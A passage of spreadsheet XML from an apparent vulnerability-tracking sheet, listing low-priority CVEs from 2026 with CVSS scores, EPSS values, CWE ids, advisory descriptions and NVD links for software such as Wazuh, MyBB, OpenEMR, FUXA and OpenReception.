          <t>SSH servers which use CertChecker as a public key callback without setting IsUserAuthority or IsHostAuthority could be caused to panic by a client presenting a certificate. CertChecker now returns an error instead of panicking when these callbacks are nil.</t>
        </is>
      </c>
      <c r="M5057" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39835</t>
        </is>
      </c>
    </row>
    <row r="5058">
      <c r="A5058" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5058" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40509</t>
        </is>
      </c>
      <c r="C5058" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5058" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5058" s="5" t="inlineStr"/>
      <c r="F5058" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5058" s="5" t="inlineStr"/>
      <c r="H5058" s="5" t="inlineStr"/>
      <c r="I5058" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J5058" s="5" t="inlineStr"/>
      <c r="K5058" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L5058" s="5" t="inlineStr">
        <is>
          <t>OpenEMR before 8.3.0 contains a cross-site request forgery vulnerability in the DICOM viewer. The web_path GET parameter in the DICOM viewer page is embedded unsanitized as a URL without validation against expected path formats. An attacker can craft a URL that causes an authenticated user with Patients - Documents permissions to make authenticated requests to arbitrary OpenEMR endpoints, enabling forced logout and other state-changing actions.</t>
        </is>
      </c>
      <c r="M5058" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40509</t>
        </is>
      </c>
    </row>
    <row r="5059">
      <c r="A5059" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5059" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41606</t>
        </is>
      </c>
      <c r="C5059" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5059" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5059" s="5" t="inlineStr"/>
      <c r="F5059" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G5059" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H5059" s="5" t="inlineStr">
        <is>
          <t>apache:thrift</t>
        </is>
      </c>
      <c r="I5059" s="5" t="inlineStr">
        <is>
          <t>2026-04-28</t>
        </is>
      </c>
      <c r="J5059" s="5" t="inlineStr"/>
      <c r="K5059" s="5" t="inlineStr">
        <is>
          <t>CWE-606, CWE-674</t>
        </is>
      </c>
      <c r="L5059" s="5" t="inlineStr">
        <is>
          <t>Uncontrolled Recursion vulnerability in Apache Thrift.
This issue affects Apache Thrift: before 0.23.0.
Users are recommended to upgrade to version 0.23.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M5059" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41606</t>
        </is>
      </c>
    </row>
    <row r="5060">
      <c r="A5060" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5060" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42338</t>
        </is>
      </c>
      <c r="C5060" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5060" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5060" s="5" t="inlineStr"/>
      <c r="F5060" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G5060" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5060" s="5" t="inlineStr">
        <is>
          <t>beaugunderson:ip-address</t>
        </is>
      </c>
      <c r="I5060" s="5" t="inlineStr">
        <is>
          <t>2026-05-12</t>
        </is>
      </c>
      <c r="J5060" s="5" t="inlineStr"/>
      <c r="K5060" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5060" s="5" t="inlineStr">
        <is>
          <t>ip-address is a library for parsing and manipulating IPv4 and IPv6 addresses in JavaScript. Prior to 10.1.1, Address6.group() and Address6.link() do not HTML-escape attacker-controlled content before embedding it in the HTML strings they return, and AddressError.parseMessage (emitted by the Address6 constructor for invalid input) can contain unescaped attacker-controlled content in one branch. An application that (1) passes untrusted input to Address6 and (2) renders the output of these methods, or the thrown error's parseMessage, as HTML (e.g. via innerHTML) is vulnerable to cross-site scripting. This vulnerability is fixed in 10.1.1.</t>
        </is>
      </c>
      <c r="M5060" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42338</t>
        </is>
      </c>
    </row>
    <row r="5061">
      <c r="A5061" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5061" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43002</t>
        </is>
      </c>
      <c r="C5061" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5061" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5061" s="5" t="inlineStr"/>
      <c r="F5061" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5061" s="5" t="inlineStr"/>
      <c r="H5061" s="5" t="inlineStr">
        <is>
          <t>openstack:horizon</t>
        </is>
      </c>
      <c r="I5061" s="5" t="inlineStr">
        <is>
          <t>2026-05-05</t>
        </is>
      </c>
      <c r="J5061" s="5" t="inlineStr"/>
      <c r="K5061" s="5" t="inlineStr">
        <is>
          <t>CWE-696</t>
        </is>
      </c>
      <c r="L5061" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in OpenStack Horizon 25.6 and 25.7 before 25.7.3. There is a write operation to the session storage backend before authentication and thus storage can be exhausted by unauthenticated requests. This is a regression of the CVE-2014-8124 fix.</t>
        </is>
      </c>
      <c r="M5061" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43002</t>
        </is>
      </c>
    </row>
    <row r="5062">
      <c r="A5062" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5062" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44254</t>
        </is>
      </c>
      <c r="C5062" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5062" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5062" s="5" t="inlineStr"/>
      <c r="F5062" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5062" s="5" t="inlineStr"/>
      <c r="H5062" s="5" t="inlineStr"/>
      <c r="I5062" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J5062" s="5" t="inlineStr"/>
      <c r="K5062" s="5" t="inlineStr">
        <is>
          <t>CWE-131, CWE-787</t>
        </is>
      </c>
      <c r="L5062" s="5" t="inlineStr">
        <is>
          <t>Wazuh is a free and open source platform used for threat prevention, detection, and response. From 1.0.0 until 4.14.6 and 5.0.0-beta2, HandleSecureMessage() in src/remoted/secure.c passes a pointer inside its stack buffer to ReadSecMSG(), and src/os_crypto/shared/msgs.c decompresses up to OS_MAXSTR bytes at that offset. For an encrypted agent message on TCP port 1514 that expands to 65,536 bytes, os_zlib_uncompress() writes a terminating null byte beyond the end of the destination buffer. The resulting stack out-of-bounds write in the root-level remoted daemon can crash message processing and disrupt agent communications. This issue is fixed in versions 4.14.6 and 5.0.0-beta2.</t>
        </is>
      </c>
      <c r="M5062" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44254</t>
        </is>
      </c>
    </row>
    <row r="5063">
      <c r="A5063" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5063" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44255</t>
        </is>
      </c>
      <c r="C5063" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5063" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5063" s="5" t="inlineStr"/>
      <c r="F5063" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5063" s="5" t="inlineStr"/>
      <c r="H5063" s="5" t="inlineStr"/>
      <c r="I5063" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J5063" s="5" t="inlineStr"/>
      <c r="K5063" s="5" t="inlineStr">
        <is>
          <t>CWE-208</t>
        </is>
      </c>
      <c r="L5063" s="5" t="inlineStr">
        <is>
          <t>Wazuh is a free and open source platform used for threat prevention, detection, and response. From 4.0.0 until 4.14.6 and 5.0.0-beta2, AuthenticationManager.check_user() in framework/wazuh/rbac/orm.py performs check_password_hash() only when the supplied username exists. A nonexistent username returns immediately, while a valid username causes an expensive bcrypt calculation. An unauthenticated remote attacker can compare authentication response times to enumerate valid Wazuh usernames and use that information in subsequent credential attacks. This issue is fixed in versions 4.14.6 and 5.0.0-beta2.</t>
        </is>
      </c>
      <c r="M5063" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44255</t>
        </is>
      </c>
    </row>
    <row r="5064">
      <c r="A5064" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5064" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44256</t>
        </is>
      </c>
      <c r="C5064" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5064" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5064" s="5" t="inlineStr"/>
      <c r="F5064" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5064" s="5" t="inlineStr"/>
      <c r="H5064" s="5" t="inlineStr"/>
      <c r="I5064" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J5064" s="5" t="inlineStr"/>
      <c r="K5064" s="5" t="inlineStr">
        <is>
          <t>CWE-117</t>
        </is>
      </c>
      <c r="L5064" s="5" t="inlineStr">
        <is>
          <t>Wazuh is a free and open source platform used for threat prevention, detection, and response. From 4.4.0 until 4.14.6 and 5.0.0-beta2, api/api/middlewares.py decodes the Basic authentication username before credential validation and passes it to the access logger without neutralizing control characters. api/api/alogging.py interpolates that value into the plain-text API log. An unauthenticated attacker can include carriage returns or line feeds in the username to forge entries, obscure activity, or poison systems that consume the plain-text audit log. The JSON log format is not affected because JSON serialization escapes these characters. This issue is fixed in versions 4.14.6 and 5.0.0-beta2.</t>
        </is>
      </c>
      <c r="M5064" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44256</t>
        </is>
      </c>
    </row>
    <row r="5065">
      <c r="A5065" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5065" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45125</t>
        </is>
      </c>
      <c r="C5065" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5065" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5065" s="5" t="inlineStr"/>
      <c r="F5065" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5065" s="5" t="inlineStr"/>
      <c r="H5065" s="5" t="inlineStr"/>
      <c r="I5065" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5065" s="5" t="inlineStr"/>
      <c r="K5065" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="L5065" s="5" t="inlineStr">
        <is>
          <t>MyBB is free and open source forum software. Prior to 1.8.40, the Email User controller does not sanitize sender names correctly, resulting in mail header injection. member.php?action=do_emailuser accepts the fromname HTTP parameter for guests or the stored username for authenticated users when the cansendemail group permission is enabled. When mail_handler is set to the default PHP mail value, the sender name is used without sanitization in Return-Path and Reply-To headers, allowing arbitrary headers to be injected with CRLF sequences. This issue is fixed in version 1.8.40.</t>
        </is>
      </c>
      <c r="M5065" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45125</t>
        </is>
      </c>
    </row>
    <row r="5066">
      <c r="A5066" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5066" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45292</t>
        </is>
      </c>
      <c r="C5066" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5066" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5066" s="5" t="inlineStr"/>
      <c r="F5066" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G5066" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5066" s="5" t="inlineStr"/>
      <c r="I5066" s="5" t="inlineStr">
        <is>
          <t>2026-05-28</t>
        </is>
      </c>
      <c r="J5066" s="5" t="inlineStr"/>
      <c r="K5066" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L5066" s="5" t="inlineStr">
        <is>
          <t>opentelemetry-java is the Java implementation of the OpenTelemetry API for recording telemetry, and SDK for managing telemetry recorded by the API. Prior to 1.62.0, a vulnerability affects the baggage propagation implementation in opentelemetry-api and opentelemetry-extension-trace-propagators. Parsing oversized baggage causes unbounded memory allocation and CPU consumption. Because baggage is automatically re-injected into every outgoing request, the effect can fan out to downstream services that never received the original malicious request. This vulnerability is fixed in 1.62.0.</t>
        </is>
      </c>
      <c r="M5066" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45292</t>
        </is>
      </c>
    </row>
    <row r="5067">
      <c r="A5067" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5067" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45705</t>
        </is>
      </c>
      <c r="C5067" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5067" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5067" s="5" t="inlineStr"/>
      <c r="F5067" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5067" s="5" t="inlineStr"/>
      <c r="H5067" s="5" t="inlineStr"/>
      <c r="I5067" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J5067" s="5" t="inlineStr"/>
      <c r="K5067" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L5067" s="5" t="inlineStr">
        <is>
          <t>OpenSIPS is a Session Initiation Protocol (SIP) server implementation. In versions prior to 3.6.6 and 4.0.0-rc1, the find_line_delimiter() function in the multipart body parser performs an out-of-bounds read via strncmp() when searching for MIME boundary delimiters. After finding a -- pattern near the end of the body, the function compares delimiter.len bytes (typically 20-70) starting from a position at or past the logical end of the body buffer, reading past the body boundary. The bug triggers when a SIP message has Content-Type: multipart/mixed with a boundary parameter and its body contains -- within two to three bytes of the body's end without being followed by the actual boundary delimiter. This issue has been fixed in versions 3.6.6 and 4.0.0-rc1.</t>
        </is>
      </c>
      <c r="M5067" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45705</t>
        </is>
      </c>
    </row>
    <row r="5068">
      <c r="A5068" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5068" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45734</t>
        </is>
      </c>
      <c r="C5068" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5068" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5068" s="5" t="inlineStr"/>
      <c r="F5068" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5068" s="5" t="inlineStr"/>
      <c r="H5068" s="5" t="inlineStr"/>
      <c r="I5068" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5068" s="5" t="inlineStr"/>
      <c r="K5068" s="5" t="inlineStr">
        <is>
          <t>CWE-837</t>
        </is>
      </c>
      <c r="L5068" s="5" t="inlineStr">
        <is>
          <t>MyBB is free and open source forum software. Prior to 1.8.40, the built-in CAPTCHA does not consistently enforce single-use semantics, allowing remote attackers to bypass CAPTCHA controls through challenge replay. The successful validation paths in contact.php, member.php?action=do_resendactivation, member.php?action=do_lostpw, member.php?action=do_emailuser, and sendthread.php?action=do_sendtofriend do not call captcha::invalidate_captcha() for the MyBB Default CAPTCHA selected by the captchaimage setting. A valid response can therefore be reused until a non-vulnerable endpoint invalidates it, an incorrect response is submitted, or the challenge expires. This issue is fixed in version 1.8.40.</t>
        </is>
      </c>
      <c r="M5068" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45734</t>
        </is>
      </c>
    </row>
    <row r="5069">
      <c r="A5069" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5069" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46405</t>
        </is>
      </c>
      <c r="C5069" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5069" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5069" s="5" t="inlineStr"/>
      <c r="F5069" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5069" s="5" t="inlineStr"/>
      <c r="H5069" s="5" t="inlineStr"/>
      <c r="I5069" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J5069" s="5" t="inlineStr"/>
      <c r="K5069" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L5069" s="5" t="inlineStr">
        <is>
          <t>OpenBao is an open source identity-based secrets management system. Prior to version 2.5.4, in OpenBao's Kerberos auth method on the `GET` handler, or when an `Authorization: Negotiate` header is supplied, the response is includes a `logical.Auth` object in addition to an error message. This results in tokens being created with only the default policy, default TTL, and no entity information, which are hidden by the returned error message. No access to these tokens by the caller occurs and the authentication token is not ever made accessible outside of `sys/raw`. This is fixed in OpenBao v2.5.4. As a workaround, users may set a rate limit quota to limit the creation of these paths. As the path is unauthenticated, it isn't possible to deny access to it.</t>
        </is>
      </c>
      <c r="M5069" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46405</t>
        </is>
      </c>
    </row>
    <row r="5070">
      <c r="A5070" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5070" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46482</t>
        </is>
      </c>
      <c r="C5070" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5070" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5070" s="5" t="inlineStr"/>
      <c r="F5070" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5070" s="5" t="inlineStr"/>
      <c r="H5070" s="5" t="inlineStr"/>
      <c r="I5070" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5070" s="5" t="inlineStr"/>
      <c r="K5070" s="5" t="inlineStr">
        <is>
          <t>CWE-636</t>
        </is>
      </c>
      <c r="L5070" s="5" t="inlineStr">
        <is>
          <t>### Impact
The registration component does not validate the text-based _Security Question_ CAPTCHA correctly, allowing attackers to bypass the challenge via a specially crafted value.
[CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)
### Details
The public _Registration_ workflow ([`member.php?action=do_register`](https://github.com/mybb/mybb/blob/mybb_1839/member.php#L262-L307)) accepts a hidden field `question_id` — expected to match the question session identifier (`mybb_questionsessions.sid`) — and validates the challenge answer without a fail-closed fallback for invalid identifiers. If the value is blank, forged, or expired, the request continues without a question-related error.
### Patches
MyBB 1.8.(...) resolves this issue with the following changes:
- Commit: https://github.com/mybb/mybb/commit/
  - `.patch`: https://github.com/mybb/mybb/commit/.patch
### References
- Release Notes: https://mybb.com/versions/1.8.(...)/
### For more information
Go to [mybb.com/security](https://mybb.com/security/) to report possible security concerns or to learn more about security research at MyBB.
### Contact
The security team can be reached at [security@mybb.com](mailto:security@mybb.com).</t>
        </is>
      </c>
      <c r="M5070" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46482</t>
        </is>
      </c>
    </row>
    <row r="5071">
      <c r="A5071" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5071" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47680</t>
        </is>
      </c>
      <c r="C5071" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5071" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5071" s="5" t="inlineStr"/>
      <c r="F5071" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5071" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H5071" s="5" t="inlineStr"/>
      <c r="I5071" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5071" s="5" t="inlineStr"/>
      <c r="K5071" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="L5071" s="5" t="inlineStr">
        <is>
          <t>The source-controller is a Kubernetes operator, specialised in artifacts acquisition from external sources such as Git, OCI, Helm repositories and S3-compatible buckets. In versions 0.0.17 through 1.8.4, an actor with the ability to influence the contents of a bucket referenced by a `Bucket` resource can cause source-controller to write fetched object data to paths outside the per-reconciliation working directory. The corruption surface is bounded by source-controller's own and downstream Flux controllers' digest verification: source-controller verifies stored artifact digests during reconciliation and rebuilds on divergence; consumers (kustomize-controller, helm-controller) verify the digest of fetched artifacts and reject mismatches. These checks prevent a manipulated artifact from reaching the cluster, but an attacker can still write files anywhere the source-controller pod has permission to write. Separately, a user with permission to create or update `GitRepository` resources can cause source-controller to test for the existence of paths outside the cloned repository. Because the result is exposed via the resource's status, this allows limited enumeration of file paths on the controller pod. This surface exists only on source-controller v1.6.0 and later, where the sparse-checkout feature was introduced. This vulnerability was fixed in source-controller v1.8.5. There is no in-product workaround. Users should upgrade to a patched version. As a defense-in-depth measure for the GitRepository sparse-checkout surface, a `ValidatingAdmissionPolicy` (or a third-party policy engine such as Kyverno or OPA Gatekeeper) can be deployed to reject `GitRepository` resources whose `.spec.sparseCheckout` entries contain `..` or absolute path segments.</t>
        </is>
      </c>
      <c r="M5071" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47680</t>
        </is>
      </c>
    </row>
    <row r="5072">
      <c r="A5072" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5072" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47720</t>
        </is>
      </c>
      <c r="C5072" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5072" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5072" s="5" t="inlineStr"/>
      <c r="F5072" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G5072" s="5" t="inlineStr"/>
      <c r="H5072" s="5" t="inlineStr"/>
      <c r="I5072" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5072" s="5" t="inlineStr"/>
      <c r="K5072" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L5072" s="5" t="inlineStr">
        <is>
          <t>FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. Prior to 1.3.2, the TDengine DAQ storage connector's escapeTdString function in server/runtime/storage/tdengine/index.js doubles single quotes but does not escape backslashes. A remote unauthenticated attacker can submit a crafted sids tag identifier through GET /api/daq or the Socket.IO DAQ_QUERY event so TDengine interprets the backslash and quote sequence as SQL syntax. The injected query can return every row from fuxa.meters, exposing historical PLC tag values, device identifiers, and device names even when FUXA authentication is enabled. This issue is fixed in version 1.3.2.</t>
        </is>
      </c>
      <c r="M5072" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47720</t>
        </is>
      </c>
    </row>
    <row r="5073">
      <c r="A5073" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5073" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48077</t>
        </is>
      </c>
      <c r="C5073" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5073" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5073" s="5" t="inlineStr"/>
      <c r="F5073" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5073" s="5" t="inlineStr"/>
      <c r="H5073" s="5" t="inlineStr"/>
      <c r="I5073" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J5073" s="5" t="inlineStr"/>
      <c r="K5073" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5073" s="5" t="inlineStr">
        <is>
          <t>OpenReception's appointment booking software provides an end-to-end encrypted appointment booking platform. Prior to version 1.1.0, the GET handler at `/api/tenants/{id}/appointments/{appointmentId}` performs no authorization check before returning the appointment record. Any party who knows or obtains a valid appointment UUID receives the full row, including channel and agent IDs, time and timezone, status, and the AES-GCM ciphertext components (`encryptedPayload`, `iv`, `authTag`, `dataKey`). The same file's DELETE handler calls `checkPermission(locals, tenantId, true)` before allowing deletion. The intent is clear: appointment records are tenant-scoped and require authentication to access. The GET handler is missing the equivalent call. The middleware chain (`apiAuthHandle`, `authGuard`) does not compensate: API paths bypass `authGuard` entirely, and `apiAuthHandle` does not block requests to non-admin paths when no token is present. Version 1.1.0 patches the issue.</t>
        </is>
      </c>
      <c r="M5073" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48077</t>
        </is>
      </c>
    </row>
    <row r="5074">
      <c r="A5074" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5074" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48078</t>
        </is>
      </c>
      <c r="C5074" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5074" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5074" s="5" t="inlineStr"/>
      <c r="F5074" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5074" s="5" t="inlineStr"/>
      <c r="H5074" s="5" t="inlineStr"/>
      <c r="I5074" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J5074" s="5" t="inlineStr"/>
      <c r="K5074" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L5074" s="5" t="inlineStr">
        <is>
          <t>OpenReception's appointment booking software provides an end-to-end encrypted appointment booking platform. Prior to version 1.0.5, the unauthenticated `/api/tenants/{id}/schedule` endpoint returns every non-archived channel for a tenant regardless of the channel's `isPublic` flag. Channels marked `isPublic = false` are intended to be invisible to public callers; the dashboard creates them deliberately to hide internal-only services from the patient booking UI. The schedule endpoint ignores the flag entirely and discloses channel names, descriptions, IDs, agent associations, pause status, confirmation requirements, and computed slot availability for the requested date range. The asymmetry between `addAppointmentToTunnel` (which enforces `eq(channel.isPublic, true)`) and the schedule endpoint (which does not) confirms the design intent: private channels exist as a real access boundary in the booking flow, just not in the schedule disclosure. Version 1.0.5 patches the issue.</t>
        </is>
      </c>
      <c r="M5074" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48078</t>
        </is>
      </c>
    </row>
    <row r="5075">
      <c r="A5075" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5075" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48094</t>
        </is>
      </c>
      <c r="C5075" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5075" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5075" s="5" t="inlineStr"/>
      <c r="F5075" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5075" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5075" s="5" t="inlineStr"/>
      <c r="I5075" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J5075" s="5" t="inlineStr"/>
      <c r="K5075" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5075" s="5" t="inlineStr">
        <is>
